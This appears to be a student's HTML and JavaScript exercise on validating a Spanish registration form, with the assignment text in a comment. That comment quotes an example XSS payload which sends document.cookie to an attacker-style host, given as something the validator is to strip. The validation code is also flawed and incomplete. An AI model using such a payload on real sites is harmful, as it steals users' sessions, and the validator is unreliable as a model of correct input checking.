<!DOCTYPE html>
<head>
    <meta charset="UTF-8">
    <title>Ejercicio 5.4 - Validación de formularios</title>
<!-- 
Añadir un botón para resetar el formulario y otro para inicializar los campos del mismo con los valores válidos que consideres oportunos.

Construir un validador para el formulario de registro que valide cada uno de los campos cuando el usuario ha terminado de introducir datos en cada uno de ellos, es decir, al perder el foco u otro evento que consideres. Si el campo no cumple las restricciones, se mostrará una alerta al usuario, pero se le permitirá seguir introduciendo datos en el resto de campos.

En el momento en el que el usuario envíe el formulario (evento submit), se validarán todos los campos y el formulario no se enviará si alguno de los campos no es válido. Las restricciones a cumplir son las siguientes:

    El nombre, email y comentarios son campos obligatorios.OK
    El campo email debe ser una dirección de email válida. OK
    El texto introducido en el campo de comentarios no debe exceder los 50 caracteres. OK
    El password debe tener una longitud mínima de 6 caracteres, y contener al menos una letra minúscula, una letra mayúscula y un dígito.
    La fecha de nacimiento debe ser válida y el usuario debe ser mayor de 18 años.
    El checkbox debe estar seleccionado.
    Eliminar cualquier script que el usuario haya podido inyectar en el formulario. Por ejemplo: <script>document.InnerHTML += "<img src='http://elhacker.com?cookie="+document.cookie+"'/>"</script>
 
-->
    <style type="text/css">
        body {font-family: arial, helvetica;}
        form {
            width: 600px;
            margin: 20px auto 0 auto;
        }
        label {
            float: left;
            width: 200px;
            font-weight: bold;
        }
        label[for="registro_condiciones"] {
            float: none;
        }
        input[type="email"],
        input[type="date"],        
        input[type="text"],
        input[type="password"] ,
        textarea{
            width: 360px;
            display: block;
        }
       
        
        input[type="checkbox"] {
            margin-left: 200px;
        }
        input[type="button"] {
            margin: 20px 0 0 200px;
            display: inline-block;
        }
        input[type="reset"] {
            margin: 5px 0 0 2px;
            display: inline-block;
        }
        #Rellenar {
            margin: 5px 0 0 2px;
            display: inline-block;
        }
    </style>
    
<script>


    window.onload = function(){
        var fecha = document.getElementById("nacimiento"); 
        fecha.addEventListener("focusout", validar);
    }

    function Edad(FechaNacimiento) {
            var fechaNace = new Date(FechaNacimiento);
            var fechaActual = new Date();
            var mes = fechaActual.getMonth();
            var dia = fechaActual.getDate();
            var año = fechaActual.getFullYear();
            fechaActual.setDate(dia);
            fechaActual.setMonth(mes);
            fechaActual.setFullYear(año);
            let edad = Math.floor(((fechaActual - fechaNace) / (1000 * 60 * 60 * 24) / 365));
            return parseInt(edad);
    }

    function validar(event) {
        var oldedad = document.forms[0].nacimiento.value;
        var nedad = Edad(oldedad);
    
            if (isNaN(nedad)) alert( "El campo debe ser numérico!"); document.forms[0].nacimiento.value =""; 
            if (nedad < 18 ) alert( "Deberías tener más de 18 años!"); document.forms[0].nacimiento.value =""; 
            if (nedad > 120 ) alert( "Seguro que tienes más de 120 años?"); document.forms[0].nacimiento.value =""; 
            if (nedad > 18 && nedad <= 120) alert( "OK: El campo es correcto");
    
    }

    


</script>    
</head>
<body>
        <h1><br/><center><span id="mens"></span></center></h1>
  <form name="miFormulario" action="https://menudodia.es/clases/formulario.php?op=opcion" method="POST">
    <fieldset>
      <legend>Registro</legend>
        <label>Nombre:</label><input type="text" id="nombre" name="nombre" required>
        <label>Apellido:</label><input type="text" id="apellido" name="apellido">
        <label>Email:</label><input type="email" id="email" name="email" required>
        <label>Password:</label><input type="password" id="password" name="password" minlength="6" pattern="[A-Za-z0-9]+" >
        <label>Fecha nacimiento:</label><input type="date" id="nacimiento" name="nacimiento">
        <label>Comentarios:</label>
        <textarea id="comentarios" name="comentarios" rows="10" maxlength="50" required></textarea>
        <input type="checkbox" name="condiciones" id="condiciones" checked>
        <label for="registro_condiciones">Acepto las condiciones del servicio.</label>
        <br>
        <input id="Enviar" type="submit" value="Enviar"/>
        <input id="Borrar" type="reset" value="Borrar"/>
        <input id="Rellenar" type="button" value="Rellenar"/>
    </fieldset>
  </form>
</body>
</html>